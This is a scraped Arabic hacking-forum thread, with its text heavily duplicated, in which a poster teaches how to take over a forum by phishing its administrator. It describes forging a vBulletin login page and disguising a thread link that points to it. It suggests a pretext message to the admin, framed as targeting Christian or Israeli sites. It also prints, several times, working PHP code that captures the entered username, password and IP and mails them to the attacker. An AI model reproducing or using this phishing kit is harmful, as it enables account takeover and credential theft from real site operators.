عاطل بدرجة الزحف
05-23-2015, 01:17 PM
السلام عليكم ورحمة الله وبركاته
الموضوع اهداء الى المشككين اني هكر ولا هاذه الموضوع هو الاثبات
انا ما اضر انفع المسلمينبين خطين
السلام عليكم ورحمة الله وبركاته
كيفكم شباب ؟
ان شاء الله طيبين
طبعا في كثير من المواقع لمن تجي تستهدفها ماتحصل ثغرات
تخمن على الوردبريس + جوميلا وماتطلع بنتيجة
انا بأعطيكم الفكرة والباقي عليكم
المتطلبات
1/ منتدى على سيرفر الهدف
====================
اول شئ تدخل على المنتدى وتزور صفحة الدخول
كيف تزورها تابع الشرح اللي في الفديو
https://www.youtube.com/watch?v=bYAmz5n-ofk
طيب زورت الصفحة وكل شئ ايش بتسوي
تروح لمدير المنتدى وترسلو رسالة خاصه وبحركة فنية بسيطه تلغم رابط موضوع
كيف تلغمو تاخذ رابط اي موضوع
كسبيل مثال هذا
تصميم فلاشي ^_^ - مجتمع الفرسان (http://www.x6x.net/vb/t17905/)
تقوم تعدل على الرابط
بزيادة رقمين
http://www.x6x.net/vb/showthread.php?t=1790505
علشان لمن ينسخ الرابط يعطيه خطا
وتقوم تسوي ارتباط تشعبي
عن طريق الايقونه هذه
http://www.x6x.net/vb/images/editor/createlink.gif
تضغط وبتحط رابط الصفحة المزوره
طبعا الرساله الخاصه لمن ترسلها للمدير على حسب الموقع
مثلا
تقول
في موضوع في المنتدى يدعو الى الاسلام نرجو حذف الموضوع << طبعا لمن يكون الموقع مسيحي او اسرائيلي
ترجم قوقل يامعلم وارسل
طبعا راح ارفقلكم في الموضوع
كود التغليم اللي في الفديو
<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }
header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?> (http://www.x6x.net/vb/search.php?do=finduser&u=176477&starteronly=1)
تابع وبتركيز
تنسيق الكود
ياليت شرح بسيط للكود
كود PHP:
<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }
header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>
http://www.x6x.net/vb/frsan_hexll/buttons/reputation.gif (http://www.x6x.net/vb/reputation.php?p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/report.gif (http://www.x6x.net/vb/report.php?p=1305272184)
http://www.x6x.net/vb/images/likeicon.png (http://www.x6x.net/vb/t270042/#)
http://www.x6x.net/vb/frsan_hexll/buttons/quote.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/multiquote_off.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/quickreply.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184)
فترة الأقامة : 23 يوم معدل التقييم : http://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gif زيارات الملف الشخصي : 9 (http://www.x6x.net/vb/u178373/)
إحصائية مشاركات » xjava (http://www.x6x.net/vb/u178373/) المواضيـعالــــــردود [+ (http://www.x6x.net/vb/search.php?do=finduser&u=178373&starteronly=1)] [+ (http://www.x6x.net/vb/search.php?do=finduser&u=178373)] بمـــعــدل : 0.30 يوميا
xjavaمشاهدة ملفه الشخصي (http://www.x6x.net/vb/u178373/)إرسال رسالة خاصة إلى xjava (http://www.x6x.net/vb/private.php?do=newpm&u=178373)البحث عن كل مشاركات xjava (http://www.x6x.net/vb/search.php?do=finduser&u=178373)إضافة xjava إلى الإتصالات الخاصة بك (http://www.x6x.net/vb/profile.php?do=addlist&userlist=buddy&u=178373)
http://www.x6x.net/vb/frsan_hexll/statusicon/post_old.gif 04-30-2015, 01:01 PM #3 (http://www.x6x.net/vb/t270042/#post1305272196) الهيكل العظمي (http://www.x6x.net/vb/u176477/)
.: HaCkErs x6x :.
http://www.x6x.net/vb/images/smilies/017[1].gif::.KAREEM HACK ::. http://www.x6x.net/vb/images/smilies/eh_s(22)[1].gif
http://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gif
http://www.x6x.net/vb/image.php?u=176477&dateline=1408275638 (http://www.x6x.net/vb/u176477/)
http://www.x6x.net/vb/frsan_hexll/statusicon/user_online.gif
بيانات اضافيه [ + (http://www.x6x.net/vb/t270042/#posts) ] رقم العضوية : 176477 تاريخ التسجيل : 13-08-2014 أخر زيارة : اليوم (12:23 PM) المشاركات : 846 [ + (http://www.x6x.net/vb/t270042/#posts) ] التقييم : 18632 الدولهـ http://www.x6x.net/vb/helm/flags/Saudi Arabia.gif
3270
http://www.x6x.net/vb/images/icons/icon1.gif رد: اختراق اي منتدى عن طريق الهندسة الاجتماعية وتزور الصفحة هع
اقتباس:
المشاركة الأصلية كتبت بواسطة xjava http://www.x6x.net/vb/frsan_hexll/buttons/viewpost.gif (http://www.x6x.net/vb/t270042/#post1305272184)
تنسيق الكود
ياليت شرح بسيط للكود
كود PHP:
<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }
header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>
الموضوع اهداء الى المشككين اني هكر ولا هاذه الموضوع هو الاثبات
انا ما اضر انفع المسلمينبين خطين
السلام عليكم ورحمة الله وبركاته
كيفكم شباب ؟
ان شاء الله طيبين
طبعا في كثير من المواقع لمن تجي تستهدفها ماتحصل ثغرات
تخمن على الوردبريس + جوميلا وماتطلع بنتيجة
انا بأعطيكم الفكرة والباقي عليكم
المتطلبات
1/ منتدى على سيرفر الهدف
====================
اول شئ تدخل على المنتدى وتزور صفحة الدخول
كيف تزورها تابع الشرح اللي في الفديو
https://www.youtube.com/watch?v=bYAmz5n-ofk
طيب زورت الصفحة وكل شئ ايش بتسوي
تروح لمدير المنتدى وترسلو رسالة خاصه وبحركة فنية بسيطه تلغم رابط موضوع
كيف تلغمو تاخذ رابط اي موضوع
كسبيل مثال هذا
تصميم فلاشي ^_^ - مجتمع الفرسان (http://www.x6x.net/vb/t17905/)
تقوم تعدل على الرابط
بزيادة رقمين
http://www.x6x.net/vb/showthread.php?t=1790505
علشان لمن ينسخ الرابط يعطيه خطا
وتقوم تسوي ارتباط تشعبي
عن طريق الايقونه هذه
http://www.x6x.net/vb/images/editor/createlink.gif
تضغط وبتحط رابط الصفحة المزوره
طبعا الرساله الخاصه لمن ترسلها للمدير على حسب الموقع
مثلا
تقول
في موضوع في المنتدى يدعو الى الاسلام نرجو حذف الموضوع << طبعا لمن يكون الموقع مسيحي او اسرائيلي
ترجم قوقل يامعلم وارسل
طبعا راح ارفقلكم في الموضوع
كود التغليم اللي في الفديو
<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }
header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?> (http://www.x6x.net/vb/search.php?do=finduser&u=176477&starteronly=1)
تابع وبتركيز
تنسيق الكود
ياليت شرح بسيط للكود
كود PHP:
<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }
header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>
http://www.x6x.net/vb/frsan_hexll/buttons/reputation.gif (http://www.x6x.net/vb/reputation.php?p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/report.gif (http://www.x6x.net/vb/report.php?p=1305272184)
http://www.x6x.net/vb/images/likeicon.png (http://www.x6x.net/vb/t270042/#)
http://www.x6x.net/vb/frsan_hexll/buttons/quote.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/multiquote_off.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/quickreply.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184)
فترة الأقامة : 23 يوم معدل التقييم : http://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gif زيارات الملف الشخصي : 9 (http://www.x6x.net/vb/u178373/)
إحصائية مشاركات » xjava (http://www.x6x.net/vb/u178373/) المواضيـعالــــــردود [+ (http://www.x6x.net/vb/search.php?do=finduser&u=178373&starteronly=1)] [+ (http://www.x6x.net/vb/search.php?do=finduser&u=178373)] بمـــعــدل : 0.30 يوميا
xjavaمشاهدة ملفه الشخصي (http://www.x6x.net/vb/u178373/)إرسال رسالة خاصة إلى xjava (http://www.x6x.net/vb/private.php?do=newpm&u=178373)البحث عن كل مشاركات xjava (http://www.x6x.net/vb/search.php?do=finduser&u=178373)إضافة xjava إلى الإتصالات الخاصة بك (http://www.x6x.net/vb/profile.php?do=addlist&userlist=buddy&u=178373)
http://www.x6x.net/vb/frsan_hexll/statusicon/post_old.gif 04-30-2015, 01:01 PM #3 (http://www.x6x.net/vb/t270042/#post1305272196) الهيكل العظمي (http://www.x6x.net/vb/u176477/)
.: HaCkErs x6x :.
http://www.x6x.net/vb/images/smilies/017[1].gif::.KAREEM HACK ::. http://www.x6x.net/vb/images/smilies/eh_s(22)[1].gif
http://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gif
http://www.x6x.net/vb/image.php?u=176477&dateline=1408275638 (http://www.x6x.net/vb/u176477/)
http://www.x6x.net/vb/frsan_hexll/statusicon/user_online.gif
بيانات اضافيه [ + (http://www.x6x.net/vb/t270042/#posts) ] رقم العضوية : 176477 تاريخ التسجيل : 13-08-2014 أخر زيارة : اليوم (12:23 PM) المشاركات : 846 [ + (http://www.x6x.net/vb/t270042/#posts) ] التقييم : 18632 الدولهـ http://www.x6x.net/vb/helm/flags/Saudi Arabia.gif
3270
http://www.x6x.net/vb/images/icons/icon1.gif رد: اختراق اي منتدى عن طريق الهندسة الاجتماعية وتزور الصفحة هع
اقتباس:
المشاركة الأصلية كتبت بواسطة xjava http://www.x6x.net/vb/frsan_hexll/buttons/viewpost.gif (http://www.x6x.net/vb/t270042/#post1305272184)
تنسيق الكود
ياليت شرح بسيط للكود
كود PHP:
<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }
header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>